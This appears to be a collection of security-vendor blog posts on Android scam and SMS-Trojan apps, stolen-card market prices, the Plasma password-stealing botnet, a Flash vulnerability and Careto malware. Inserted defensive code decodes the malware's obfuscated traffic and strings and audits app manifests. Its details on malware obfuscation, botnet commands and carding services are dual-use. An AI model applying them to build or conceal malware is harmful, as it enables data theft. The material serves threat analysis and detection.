Figure 7: A Kakao Talk message that leads users to one-click-fraud sites.

McAfee Mobile Security detects this kind of Android app related to the scam activities as a variant of Android/OneClickFraud, and also blocks web browser access to such one-click-fraud sites on Android.

Although we cannot be sure that an attack on Google Play on last year's scale will happen again, we can easily imagine that one-click scammers will continue to look for careless victims, lead them to malicious sites, and trick them into paying using various tactics.

As always, users should ignore any approach from, and any payment request by, scammers, even if they have accidentally visited a fraudulent website and registered for its "service."


New Year’s Sales; Big Discounts on Stolen Data


Headlines in January have been dominated by revelations of one retailer after another suffering enormous breaches of personal and financial data. From December 18, 2013, when the Target breach was publicly disclosed, to Neiman Marcus, the cumulative loss runs to many tens of millions of records. At McAfee Labs we analyzed the point-of-sale (PoS) malware used in the Target breach, which answers one of the key questions: how were attackers able to intercept approximately 110,000,000 records of payment, transaction, and other personally identifiable data? Another question is the net effect of so much data flooding the underground economy.

In Q2 2013 we published the white paper "Cybercrime Exposed," which analyzed the broad range of cybercrime products, tools, and services. One of its categories was "Hacking as a Service," in which the end customer can simply purchase products such as credit card data. The indicative prices are presented below:

[Figure 1: indicative prices from "Cybercrime Exposed"]

While those prices may have been reasonably accurate in the summer of 2013, as a direct result of the recent breaches the prices for large volumes of credit cards have plummeted. With new dumps of card data from recent breaches appearing with alarming regularity, the oversupply of cardholder data is clearly depressing prices. This is demonstrated by the recent dumps titled "Eagle Claw 1" and "Eagle Claw 2," shown in the screenshots below; "Tortuga" is a little older:

[Figures 2 and 3: screenshots of the Eagle Claw and Tortuga dump listings]

Specific information in the screenshots has been intentionally obfuscated. This is only one of many dumps available; earlier examples include Tortuga and Barbarossa. As the example below demonstrates, prices do appear to be falling as more card data floods the marketplace:

[Figures 4 and 5: price listings]

As of January 31, the price list for card dumps and cards ranges from US$2.00 to US$85.00 depending on geography and the completeness of the data (for example, whether the CVV2 is included).

[Figures 6, 7, 8, and 10: price list screenshots]

Note that in addition to Bitcoin, this site (and others) accepts WebMoney, Lesspay, Western Union, and MoneyGram. In our recent research paper "Digital Laundry" we reviewed the role of virtual currencies in cybercrime.

To further illustrate the pricing, here are some current listings on carding forums and markets that are not affiliated with the Lampeduza Republic:

[Figure: listings on carding markets not affiliated with the Lampeduza Republic]

Compare this to prices from January 2011:

[Figure 11: prices from January 2011]

We should not be surprised, and these examples are just the tip of the iceberg. Price reduction is only one effect; forum participants are also showing considerable frustration at the disclosure of these breaches. The excerpts below show recent commentary from the community directed at a notable independent security researcher:

[Figures 12 to 14: forum commentary directed at the researcher]

Note the spelling of "картонко" above. You have seen this before if you have been following the news around the retail POS breaches; in this context it refers to cards (that is, credit cards).

[Figure 15: forum excerpt]

Stolen data, card numbers, and other financial jewels are not all that is available in these forums, markets, and communities. Many provide a full service: it is common to be able to acquire specific software "tools of the trade," or the services of those who will use the tools for you, so as to distance yourself (or your customer) from some of the risk.

Some examples:

Tools:

  • General malware
  • Keylogging and Backdoor Trojans (kit and ready-made)
  • Crypting / Packing Tools
  • Scripts / Probes / Scanners
  • Brute force scripts (tailored to specific accounts, i.e. Paypal)
  • Cameras, Skimmers, and other hardware solutions
  • RFID & NFC Tools

[Figure 16: tool listings]

Services:

  • Education / Classes (Carding tools, lingo, POS and Banking software)
  • Escrow and Anonymity Services
  • Tool and Exploit development
  • Shipping services (stealth and anonymous)
  • Currency “conversion”
  • CC and CVV Verification
  • ID and Passport Creation
  • Email / SMTP services (including flooding / DoS)
  • VPN
  • Reverse engineering
  • Decryption (ex: password cracking, etc)
  • Printing and Embossing

[Figure 17: service listings]

With further revelations hitting the media daily, we can expect the supply of stolen data for sale to increase, and prices to fall further. Moreover, as we documented in the "Cybercrime Exposed" white paper, the technical bar for becoming a cybercriminal has never been lower; all that is required is access to the Internet.



Chat Friend Finder Apps on Google Play Leak Personal Information


Somewhat controversial websites and apps called chat friend finders, or ID BBSs (bulletin board systems), are spreading widely in Japan. They allow users of popular messaging services such as LINE and Kakao Talk to meet others by publishing profiles and service IDs without disclosing real phone numbers or email addresses. These sites and apps are not officially supported by the service operators and are usually discouraged because of the potential danger; some users appear to have become involved in crimes committed by criminal "friends."

McAfee Labs has recently found suspicious chat friend finder apps on Google Play that target Android device users. These apps allow users to register and publish their IDs for several well-known communication services but at the same time secretly leak personal information such as phone numbers and Google account names (Gmail addresses in most cases).

Figure 1: Chat friend finder apps on Google Play that leak personal information.

Some of these apps appear to target mainly Japanese users: they offer a Japanese interface (as well as other languages) and support Mixi, a Japan-specific service. On the other hand, we suspect the apps were created by Korean-speaking developers, because the Japanese is sometimes unnatural and we can see Korean chat messages; the common server used by all of these apps also appears to be located in South Korea, judging by its IP address.

The app description pages on Google Play look as if they were copied from similar Japanese apps with slight modifications. For example, a page says users must accept the terms and conditions in a dialog at first launch, yet there is no such dialog. We doubt these apps are carefully or securely designed.

Figure 2: An example of a dangerous chat friend finder app.

One of these apps allows users to publish their service IDs for LINE, Kakao, Mixi, and Skype, as well as profile information such as a photograph, nickname, gender, and residential area. This information is disclosed to other users of the app, enabling users to approach or be approached by others. The apps also support chatting.

However, these apps secretly send the user's phone number, email address (Google account name), IMEI, and SIM serial number to a server managed by the app developer. Storing phone numbers and email addresses together with service IDs, public profile information, and chat contents is clearly riskier than storing that data separately: once it leaks, malicious parties can approach specific users by phone or email while already knowing their preferences and activities across various messaging services.

The secret collection of this personal information, and its association with various IDs and profile data, is not disclosed to users. As always, there is also the risk that security vulnerabilities in the apps or in their data management server could leak the information to malicious third parties.

Figure 3: Chat friend candidate list and user profile registration screens.

At installation these apps request many permissions, which seem excessive for the functions of the apps. The dangerous information leak relies on only two of them: READ_PHONE_STATE and GET_ACCOUNTS. The remaining requests appear to be used by ad modules in the apps, or may be unused.

Users should be very careful about permissions requested by Android apps, and also confirm that the app provider is trustworthy before providing any permissions.

Figure 4: These apps request many kinds of permissions.

Using chat ID BBS sites or apps is dangerous even without information leaks. These new apps expose careless users to a much higher risk of having their personal information linked to anonymous IDs and various messaging services. If users really want to use a chat ID BBS, we recommend visiting a simple website rather than installing an app, to prevent unnecessary information leaks.

McAfee Mobile Security detects these suspicious apps as Android/ChatLeaker.F.


Vietnamese ‘Adult’ Apps on Google Play Open Gate to SMS Trojans


SMS-related malware, including premium-SMS fraud and SMS spying, makes up a large portion of today's Android malware families. Such malware is actively distributed via unofficial or malicious app stores, but it is rare to find it on Google Play, the world's largest official Android app store. Nonetheless, we have recently seen SMS Trojans on Google Play.

McAfee has found on Google Play two adult-oriented apps in Vietnamese that download a malicious SMS Trojan app impersonating RealPlayer. The malware comes from a remote server and persuades careless users to install and activate it as a DeviceAdmin app.

Figure 1: Malicious apps on Google Play that download an SMS Trojan.

These apps look like adult-content viewers, yet at installation they request excessive permissions that are unnecessary for this kind of viewer app.

Just after launch, they show a dialog offering to download the latest RealPlayer app to view adult movies in HD. If the user accepts, the app downloads RealPlayer.apk from the remote server.

Figure 2: The dialog that tricks users into downloading and installing a fake RealPlayer.

After the download, the user is prompted to accept an "update" of the first app, because the downloaded app has the same package name as the one that initiated the download.

Figure 3: The confirmation dialog to update the original app with the downloaded one.

The downloaded app also requests excessive permissions, including SMS-related ones, and asks the user to activate it as a device administrator. It tries to persuade the user with the message "Your boss told you to do this," which is not very persuasive. Finally it removes its icon from the home screen to make itself invisible to the user.

Figure 4: The confirmation dialog to activate the fake app as a device administrator.

The downloaded app, which still claims to be RealPlayer, does not let users view adult movies in HD. Instead it registers several broadcast receivers, triggered by completion of the device's boot sequence, by package additions and removals, and by receipt of SMS messages, and it starts background services that communicate with its control server over HTTP, as typical Android SMS Trojans do.

The app contains the following features:

  • Sends SMS messages to a phone number with a text message, both specified in the command from the server.
  • Updates the app by downloading the new app package, based on the device’s IMEI and the app package version.
  • Discards SMS messages received from a predefined set of phone numbers.
  • Disables and enables these activities, based on server requests.

The app does nothing special as a device administrator for now, because the current implementation is empty; it just forces users to take extra steps to deactivate it before uninstalling. However, the Trojan could be updated to a more malicious version at the server's request.
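An added Python example, not from either post, showing how the permission and component checks described here and in the chat friend finder post above can be automated against a decoded AndroidManifest.xml. It flags permissions that exceed what the app's stated purpose needs (READ_PHONE_STATE and GET_ACCOUNTS for an image viewer, the SMS permissions for a "player"), a device-administrator receiver, and receivers for boot, package, and SMS broadcasts. The manifest below is constructed for the example and its package and class names are invented.

```python
import xml.etree.ElementTree as ET
from typing import List, Set, Tuple

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def android_attr(name: str) -> str:
    """ElementTree spells the android: prefix as a Clark-notation namespace."""
    return "{%s}%s" % (ANDROID_NS, name)


# Why each permission matters, based on the behaviour described in the two posts.
PERMISSION_RISK = {
    "android.permission.READ_PHONE_STATE": "exposes phone number, IMEI and SIM serial",
    "android.permission.GET_ACCOUNTS": "exposes the Google account name (Gmail address)",
    "android.permission.SEND_SMS": "can send premium-rate or spam SMS",
    "android.permission.RECEIVE_SMS": "can intercept or discard incoming SMS",
    "android.permission.READ_SMS": "can read stored SMS",
    "android.permission.RECEIVE_BOOT_COMPLETED": "can restart itself after reboot",
}
RECEIVER_ACTION_RISK = {
    "android.intent.action.BOOT_COMPLETED": "receiver runs at boot",
    "android.intent.action.PACKAGE_ADDED": "receiver watches package installs",
    "android.intent.action.PACKAGE_REMOVED": "receiver watches package removals",
    "android.provider.Telephony.SMS_RECEIVED": "receiver sees incoming SMS",
}
DEVICE_ADMIN_ACTION = "android.app.action.DEVICE_ADMIN_ENABLED"
BIND_DEVICE_ADMIN = "android.permission.BIND_DEVICE_ADMIN"

Finding = Tuple[str, str, str]  # (kind, name, reason)


def audit_manifest(manifest_xml: str, expected_permissions: Set[str]) -> List[Finding]:
    """Report permissions beyond the expected set, plus risky receivers."""
    root = ET.fromstring(manifest_xml)
    findings: List[Finding] = []
    declared = {e.get(android_attr("name")) for e in root.iter("uses-permission")}
    for perm in sorted(declared - expected_permissions):
        findings.append(("permission", perm,
                         PERMISSION_RISK.get(perm, "not needed for the app's stated purpose")))
    for recv in root.iter("receiver"):
        name = recv.get(android_attr("name"), "?")
        actions = {a.get(android_attr("name")) for a in recv.iter("action")}
        if DEVICE_ADMIN_ACTION in actions or recv.get(android_attr("permission")) == BIND_DEVICE_ADMIN:
            findings.append(("receiver", name,
                             "device administrator receiver: must be deactivated before uninstall"))
        for action in sorted(actions & set(RECEIVER_ACTION_RISK)):
            findings.append(("receiver", name, RECEIVER_ACTION_RISK[action]))
    return findings


# What a plain image viewer plausibly needs (assumption for the example).
IMAGE_VIEWER_PERMISSIONS = {"android.permission.INTERNET",
                            "android.permission.READ_EXTERNAL_STORAGE"}

# Constructed manifest mimicking the behaviour described above; all names are invented.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.viewer">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Viewer">
    <activity android:name=".MainActivity"/>
    <receiver android:name=".AdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/></intent-filter>
    </receiver>
    <receiver android:name=".SmsReceiver">
      <intent-filter><action android:name="android.provider.Telephony.SMS_RECEIVED"/></intent-filter>
    </receiver>
    <receiver android:name=".BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
    <service android:name=".CommandService"/>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for kind, name, reason in audit_manifest(SAMPLE_MANIFEST, IMAGE_VIEWER_PERMISSIONS):
        print("%-10s %-45s %s" % (kind, name, reason))
```

The manifest inside an APK is binary XML, so run this on the text form produced by decoding the package with apktool first. The point of the expected-permission set is the one both posts make: the question is not whether a permission is dangerous in the abstract, but whether the app's advertised function has any use for it.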

Installing this malware, and others distributed from outside Google Play, can easily be blocked if users disable the "installation of apps from unknown sources" option in the device settings. Users also need to be very careful when installing apps, especially when an app requests more permissions than its expected features warrant.

We should be wary of social engineering techniques used to drop malware, even when the process is initiated by apps on Google Play.

McAfee Mobile Security detects these malicious apps as Android/PhimSms.A and Android/PhimSmsDropper.A.


Plasma HTTP Botnet Steals Passwords From Chrome, FileZilla


Last year we reported on the Athena HTTP botnet, which targets Windows XP systems, mostly for distributed denial-of-service attacks. Now we have examined the Plasma HTTP botnet, whose infections appear to be widespread and which targets all Windows versions. Attackers use this HTTP-based botnet primarily as a CPU and GPU cryptocurrency miner. Once a machine is infected, the bot can easily steal sensitive information such as the usernames and passwords stored locally by the Google Chrome browser and the FileZilla FTP client. We have seen a number of malicious websites hosting this botnet, most with a high infection rate. The following screenshot shows a panel with more than a thousand unique infections:

[Screenshot: plasma_online_list]

The bot sends system information such as the operating system, CPU/GPU details, and installed security software to its controller. The bot can stop or disable several security products. Here is an example of the information logged:

[Screenshot: plasma_hwid_info]

This information helps attackers choose which miner to run on each machine, based on its GPU and CPU. Attackers can send a number of commands:

[Screenshot: plasma_active_commands]

The bot can also steal passwords from infected machines, logging every entry on its control server. A sample statistics page:

[Screenshot: plasma_stats]

As we write this post, the bot has stolen more than 4,000 URLs and passwords stored in Chrome or FileZilla. The password log page:

[Screenshot: plasma_password_logs]

The Plasma HTTP bot supports five categories of malicious commands:

DDoS

  • Slowloris
  • UDP
  • Arme
  • HTTP Post
  • HTTP Get
  • Condis
  • BwFlood
  • Stop DDoS

Miner

  • CPU
  • GPU

Bot

  • Download
  • Update
  • Uninstall
  • Update Gate

Botkiller

  • Run Bot Killer Module
  • Run Hard Bot Killer Module
  • Enable Proactive Bot Killer
  • Disable Proactive Bot Killer

Misc

  • Hosts
  • Shell
  • Visit Hidden
  • Visit Visible
  • Torrent Seeder

A look at the network communication between the bot and its control server:

[Screenshot: plasma_wireshark_capture]

The request and response are simply the Base64 encoding of the data with the resulting string reversed. The decoded data:

[Screenshot: plasma_decoded_base64]

Once the bot has sent its information, the control server returns multiple commands separated by "*"; the bot then downloads the CPU and GPU miner files and runs them silently. Next it steals the stored passwords from Google Chrome and sends the password logs to its controller. The bot sending information to its server:
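As an added example (not the bot's or the panel's code), the following Python undoes the reversed-Base64 framing, splits a server reply into its "*"-separated commands, and scans captured HTTP bodies for the same framing. The sample bodies are constructed; the field layout and command names in them are placeholders, since the post shows the separator but not the command syntax.

```python
import base64
import binascii
from typing import List, Optional, Tuple


def _decode_printable(text: str) -> Optional[str]:
    """Strict Base64 decode to UTF-8 text, or None if it is not valid printable text."""
    try:
        decoded = base64.b64decode(text, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return decoded if decoded.isprintable() else None


def plasma_decode(payload: str) -> Optional[str]:
    """Undo the framing: the Base64 text travels reversed, so reverse it back, then decode."""
    return _decode_printable(payload.strip()[::-1])


def plasma_encode(text: str) -> str:
    """The inverse framing, used here only to build constructed samples."""
    return base64.b64encode(text.encode("utf-8")).decode("ascii")[::-1]


def parse_commands(decoded: str) -> List[str]:
    """Server replies carry several commands separated by '*'."""
    return [c for c in decoded.split("*") if c]


def looks_like_plasma(body: str) -> bool:
    """Heuristic: decodes to printable text only after reversal. Ordinary Base64 (or a form
    post) fails the reversed decode, and a reversed string normally starts with the '='
    padding, which strict decoding rejects in the un-reversed direction."""
    body = body.strip()
    if len(body) < 8:
        return False
    return _decode_printable(body[::-1]) is not None and _decode_printable(body) is None


def find_plasma_beacons(bodies: List[str]) -> List[Tuple[str, str]]:
    """Return (raw body, decoded text) for every body that matches the framing."""
    return [(b, plasma_decode(b)) for b in bodies if looks_like_plasma(b)]


# Constructed HTTP bodies as they might appear in a proxy log. The first two use the
# framing described above; the field layout and command names are placeholders.
SAMPLE_BODIES = [
    plasma_encode("hwid=ABC123|os=Windows 7|cpu=2|gpu=1|av=none"),  # bot check-in
    "==QdwdmK1B3Y",        # hand-encoded: reversed Base64 of "cpu*gpu" (a two-command reply)
    "id=42&action=ping",   # ordinary form post, must not be flagged
    "dGVzdA==",            # plain, un-reversed Base64 of "test", must not be flagged
]

if __name__ == "__main__":
    for raw, text in find_plasma_beacons(SAMPLE_BODIES):
        print(raw, "->", text, parse_commands(text))
```

The heuristic is deliberately loose: a Base64 string with no padding whose reversal happens to decode to printable text would also match, so treat a hit as a reason to pull the full session, not as a verdict by itself.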

[Screenshot: plasma_crypt2]

The PHP files found in the bot panel are encoded with ionCube to prevent researchers from quickly understanding the code. Here is a look at the encoded gate.php (which logs the stolen data):

[Screenshot: plasma_php_encoded]

Once decoded, we can see the actual code:

[Screenshot: plasma_decoded_php]

Although not sophisticated, the Plasma HTTP botnet offers several features. We have seen attackers use it especially for CPU and GPU mining, because it can remain silent and undetected. The bot can kill other malicious programs such as remote-access tools or rival miners. It can also edit the hosts file, run shell commands, and display web pages. Plasma HTTP has infected the latest versions of Windows, using social engineering to obtain the privileges it requires. The password logs we have seen show how dangerous this botnet can be and that your sensitive information is at risk.


Product Coverage and Mitigation for CVE-2014-0497 (Adobe Flash Player)


On February 4, Adobe released an out-of-band update for Adobe Flash Player. The update addresses a critical remote code execution vulnerability that is being actively exploited in the wild. The update applies to Windows, Mac OS X, and Linux.

We are currently analyzing details and indicators. Watch this space for updates, indicators, and more information about this threat.

Current McAfee product coverage and mitigation:

  • McAfee Vulnerability Manager: The FSL/MVM package of February 5 includes a vulnerability check to assess if your systems are at risk.
  • McAfee Application Control: Run-Time Control locks down systems and provides protection in the form of Execution Control and Memory Protection.
  • McAfee Network Security Manager: The Network Security Emergency User Defined Signature (UDS) release of February 6 provides detection for this threat.

References:


Flash Zero-Day Vulnerability CVE-2014-0497 Lasts 84 Days


On February 4, Adobe released an out-of-band security update addressing a critical remote code execution vulnerability that is currently being exploited in the wild, according to the vendor’s blog post.

Our research team quickly responded to this threat, and we have already provided various protections through our products. (For details, check here.) We have learned that this vulnerability lies in the ActionScript Virtual Machine (AVM) implementation. Attackers can easily develop highly reliable exploits for it, so we strongly suggest that users update their Flash Players immediately.

Because the fault sits in the AVM, one would expect the weakness to affect almost every Flash Player version. However, our tests found that some older Flash Player versions are not affected by this vulnerability. We tested a number of recent releases (source); here are the results:

[Table: Flash Player versions tested and whether each is affected]

This AVM vulnerability was introduced in the update of November 12, Version 11.9.900.152 or 11.7.700.252 (for Windows). Calculating its "lifetime," we see that the vulnerability survived for 84 days (12 weeks) until February 4.

Understanding the precise affected versions not only helps us understand the vulnerability more deeply, but also gives us a trustworthy way to evaluate the risk posed by the in-the-wild exploit. This case also highlights that product and security updates can not only fix vulnerabilities but also introduce new ones, especially when new features are added.

Users of older Flash Players (specifically, versions older than 11.9.900.152 or 11.7.700.252) should still apply security updates. They may be lucky enough not to be affected by this particular threat, but all versions of Flash are at risk from other exploits.

Stay secure.

Thanks to my colleagues Jun Xie, Bing Sun, Chong Xu, and Xiaoning Li (Intel Labs) for their help with this analysis.



January 2014 #SecChat Wrap-up — Threat Predictions


Threats seem to be top of mind for the masses of late—with three large-scale attacks on major brands already this year, potentially compromising the financial data and identity of millions. And things don’t show signs of slowing down. Each year, security threats become more sophisticated and difficult to identify, with 2014 expected to be the same. Cybercriminals are constantly looking for new avenues of penetration into enterprise systems and consumer data, while security professionals across the board are wondering where the next attack will come from and how they’ll combat the growing variety of potential breaches aimed at their network and endpoint defenses.

With this in mind, McAfee Labs researchers recently released the McAfee Labs 2014 Threats Predictions report, detailing what we see as the biggest security concerns for the next 12 months.

Mobile malware, ransomware, social attacks, and big data topped our list. However, while compiling the report, we decided that we probably weren’t the only security professionals with predictions. So on January 30, we hosted a Twitter chat with Adam Wosotowsky, McAfee Labs Anti-Spam Operations Technology Principal, and Ryan Sherstobitoff, McAfee Labs Threat Researcher, to spark conversation around the topic.

For about an hour, security professionals and other interested individuals gathered on Twitter to talk shop around a variety of security issues—from big data to high-profile breaches. Below are some highlights from the chat.

What are your security predictions?

We started off by opening the floor to anyone who wanted to share their own ideas on 2014 threats. We saw two common threads emerge. First, a number of security professionals cited specific types of attacks they predicted to be on the rise in 2014.

[Screenshots: participant tweets on the attack types they expect to rise]

Meanwhile, another conversation arose around "psychological threats." The topic that got the most attention was @securelexicon's thoughts on what he referred to as apathy.

[Screenshots: @securelexicon's tweets on apathy and the replies]

Next, the group delved into specific types of attacks mentioned by participants and in the report.

Target, Neiman Marcus: What’s next?

2014 started off with a bang for the information security community, with the high-profile breaches of Target, Neiman Marcus, and Michaels Stores. We asked our participants if this was a sign of bigger attacks to come.

[Screenshot: the question tweet]

Most participants saw the number of high-profile breaches as an indicator that companies weren’t doing enough to maximize their customers’ security. @VirtualTal said that companies were simply concerned with compliance, and not actually securing their data. @aamirlakhani and @SCADAhacker agreed that companies should invest in “detection and response and not just prevention.”

It wasn’t all negative however, as @RickChrisos was quick to suggest that perhaps these headline-grabbing breaches will open the eyes of big organizations, resulting in increased security for the future.

[Screenshot: @RickChrisos tweet]

Advanced Malware, Big Data, and IoT

Three of the biggest trends discussed during our #SecChat related to emerging technologies, and how the security industry will have to respond to these developments.

First, we asked the group about their biggest challenge regarding advanced malware. Many participants, such as @Wh1t3Rabbit and @jtyrus, thought the biggest issue is that it continues to be difficult to detect. The consensus was that the security community will need to go further in looking for vulnerabilities and providing penetration tests. @GetZeroFOX had a theory on why we continue to see the amount of advanced malware grow.

[Screenshot: @GetZeroFOX tweet]

The conversation on advanced malware transitioned to a discussion on big data. Some participants, such as @TomGarcia_IS, saw big data and cloud applications as overall threats to company security. Others, such as @aamirlakhani, see big data as an opportunity.

[Screenshots: @TomGarcia_IS and @aamirlakhani tweets on big data]

Finally, we discussed one of 2014’s hottest topics to date – “the Internet of Things.” While IoT can be an exciting trend for consumers, most security professionals view it as a concern, as there are still more than a few security vulnerabilities present in new “smart” devices.

[Screenshots: participant tweets on the Internet of Things]

Overall, last week's #SecChat was an interesting snapshot of where threats are expected to head in 2014. To stay up to date on the latest security news and issues, follow #SecChat host @McAfeeBusiness on Twitter. You can also check out the entire #SecChat transcript here and read our predictions here.


Careto Worldwide Malware Attack Unmasked


On Monday Kaspersky Lab announced the discovery of a large number of malware infections across large parts of the globe. Kaspersky has named this attack Careto, after what appears to be an internal name used by the attackers for one of the malware families involved. (The word careto in Spanish means ugly face or mask and is derived from an ancient religious ritual in Portugal.)

These infections involve components whose capabilities include:

  • Stealth rootkit to hide its files and network traffic
  • Sophisticated information-gathering tools to enumerate hardware and software configurations
  • User account information stealing
  • PGP key theft
  • Uploading of user files
  • Downloading of new and updated malware

The samples that we at McAfee Labs have seen suggest that this attack has been going on since 2007. If that is the case, the attackers have been very successful in both deploying and maintaining their malware unnoticed. The ramifications of this attack are likely to be serious and may come to light only after much more research and analysis.

While analyzing this malware, we very quickly realized that this would be no easy task. Starting with two simple installers, we rapidly ended up with 39 files to analyze and reverse-engineer. To further complicate matters, several parts of the malware were resistant to standard analysis techniques and required in-depth reverse engineering. As we slowly peeled away the layers, we found a highly sophisticated attack requiring a lot of analysis. The number of components involved and the on-demand encoding and decoding of strings with a modified RC4 algorithm gave us insight into Careto's complexity. In this post we offer a preview. For a more detailed description of the various modules, please refer to our upcoming McAfee Labs Threat Advisory. (We will add a link after the Advisory is published.)

The malware involved in this attack seems to be divided roughly into two separate groups: Careto and SGH. Both of these families are extremely modular in their design, allowing for very simple maintenance and upgrading because only small components are required rather than a single large file. The attackers clearly had a long-term view when they were developing this malware.

 

Combined Flow for Careto

 

Custom Encryption

One of the first things we found when we started digging into the samples was the extensive use of encryption to obfuscate both incriminating strings and data objects that the malware used in its attack. These objects included both a payload file for dropping and configuration data blocks.

The encryption code looked familiar and in many ways resembled RC4; however, detailed analysis revealed that they were using a modified algorithm. The strings in every sample were encrypted using a custom RC4 algorithm along with an entropy-equalizer function to prevent automated systems from detecting anomalies.

Each encrypted byte appears to have 0x80 added to it, as in this Hiew dump:

(Hiew screenshot of an encoded string)

Before being passed to the custom RC4 function, each character is decoded using the following function (cleaned up from the original listing: unsigned char avoids sign-extension surprises and gives the same result modulo 256):

unsigned char decode_character(const unsigned char *encryptedString, int index)
{
    /* One plaintext byte is stored as two bytes: (high nibble + 0x80), (low nibble + 0x80). */
    unsigned char ret = 0;
    ret = 16 * (encryptedString[2 * index] - 0x80);   /* high nibble back into bits 4..7 */
    ret |= encryptedString[(2 * index) + 1] - 0x80;   /* low nibble into bits 0..3 */
    return ret;
}

Basically, information stored in one encrypted byte is split across two bytes, thereby doubling the size of each encrypted string. Once a character has been decoded, it is passed to the custom RC4 function, which is similar to the original RC4 design with the following changes:

  • S-Box size has increased from 256 elements to 260 elements
  • The counter runs from 255 to 0 instead of 0 to 255 in RC4’s KSA loop
  • Inside the KSA loop, if a value to be swapped is greater than the current counter value, a new value to be swapped is found

The first character of the RC4 decryption result is ignored, while the rest comprises the decrypted string.

Once we could decrypt the encoded strings, we thought we would have the malware cracked; but then we found that the attackers had another trick up their sleeves. Once decrypted, one of the encrypted strings appeared to be yet another encryption key. Sure enough, by examining the code we saw that this key was used to decrypt a further block of data, this time using what looked like standard RC4 encryption. This step finally enabled us to decrypt the payload of the droppers and unravel the malware in all its complexity.
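The three layers described above, written out as an added example (this is not code from the original post or from the Careto samples). It assumes the standard RC4 algorithm in place of Careto’s modified variant, because the 260-entry S-box, the reversed KSA counter and the swap-index rule are not described fully enough here to reproduce; the nibble packing with 0x80, the discarded first output byte, and the use of one decrypted string as the key for the next data block are as described. All keys, strings and the fake payload are constructed for the example.

```python
"""Added example: Careto-style string decoding, layer by layer.

Layer 1: nibble packing. Each plaintext byte b is stored as two bytes,
(b >> 4) + 0x80 and (b & 0x0F) + 0x80, so every byte of the blob lands in
0x80..0x8F. Layer 2: RC4 over the unpacked bytes, after which the first
output byte is discarded. Layer 3: one decrypted string is itself the RC4
key for a further data block (the dropped payload).

Assumption: standard RC4 stands in for the modified variant the post
describes. All fixtures below are constructed, not taken from samples.
"""
from __future__ import annotations


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Stand-in for Careto's modified variant."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def unpack_nibbles(blob: bytes) -> bytes:
    """Layer 1 decode: two 0x8X bytes -> one byte (the decode_character loop)."""
    if len(blob) % 2:
        raise ValueError("packed blob must have even length")
    out = bytearray()
    for k in range(0, len(blob), 2):
        hi, lo = blob[k] - 0x80, blob[k + 1] - 0x80
        if not (0 <= hi <= 0xF and 0 <= lo <= 0xF):
            raise ValueError(f"byte pair at offset {k} is not in 0x80..0x8F")
        out.append((hi << 4) | lo)
    return bytes(out)


def pack_nibbles(data: bytes) -> bytes:
    """Inverse of unpack_nibbles; used only to build fixtures."""
    out = bytearray()
    for b in data:
        out += bytes([(b >> 4) + 0x80, (b & 0xF) + 0x80])
    return bytes(out)


def decrypt_string(key: bytes, packed: bytes) -> bytes:
    """Layers 1+2: unpack, RC4, then drop the first output byte."""
    plain = rc4(key, unpack_nibbles(packed))
    return plain[1:]


def encrypt_string(key: bytes, text: bytes) -> bytes:
    """Fixture builder: prepend one junk byte (discarded on decrypt), RC4, pack."""
    return pack_nibbles(rc4(key, b"\x00" + text))


def decrypt_payload(string_key: bytes, packed_key_string: bytes, payload: bytes) -> bytes:
    """Layer 3: the decrypted string is the RC4 key of the next data block."""
    inner_key = decrypt_string(string_key, packed_key_string)
    return rc4(inner_key, payload)


# Constructed fixtures (not from real samples).
STRING_KEY = b"string-layer-key"
PACKED_KEY_STRING = encrypt_string(STRING_KEY, b"payload-rc4-key!")
PAYLOAD_PLAIN = b"MZ\x90\x00" + b"constructed fake dropped PE body"
PAYLOAD_ENC = rc4(b"payload-rc4-key!", PAYLOAD_PLAIN)

if __name__ == "__main__":
    print(decrypt_string(STRING_KEY, PACKED_KEY_STRING))
    print(decrypt_payload(STRING_KEY, PACKED_KEY_STRING, PAYLOAD_ENC)[:4])
```

The packing is why the "entropy equalizer" works: every encoded byte sits in 0x80..0x8F, so a string scanner sees neither printable text nor high-entropy ciphertext. To adapt the decoder to a real sample, replace rc4 with the sample’s own KSA/PRGA and keep the unpack and drop-first-byte steps in the same order.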

Data Theft

Our analysis revealed data and information theft on a large scale. The initial malware samples exhibited some fairly basic information-gathering capabilities, such as user account name, system name, basic network configuration, etc. However, the malware’s modular design makes it easy to download additional malware modules to plug into the architecture. These data-gathering capabilities exceed pretty much everything else we have seen to date. The malware can gather around 100 data points in the following categories:

  • Operating system
  • Local user accounts
  • Hardware
  • Memory
  • File system
  • USB devices
  • Running processes
  • Installed software
  • Network information
  • Software
  • Hardware
  • Network
  • Snapshot
  • Private credentials

Victims of this attack include government institutions and embassies, gas and oil companies, scientific research organizations, and political activists. This is an attack of immense scale.

Our analysis of this malware is ongoing. We will publish further information as it comes to light. The full technical details of our analysis can be found in the upcoming McAfee Labs Threat Advisory.

We thank our colleagues Volodymyr Pikhur, Suriya Natarajan and Mark Olea for their analysis.


Examining Your Very Own Sefnit Trojan


Most malware is created for economic purposes. To name just a few of our reports and blogs on this topic, we have written about Cybercrime Exposed, stolen data, and the Target point-of-sale malware.

But sometimes it’s not clear to our customers how much time and skill malware authors invest in their tools. A recent case at McAfee Labs got us scratching our heads to understand what was going on. The malware in question was already detected by our products as Sefnit-FAT, but the true content of the malware couldn’t be replicated in our environment no matter what we did.

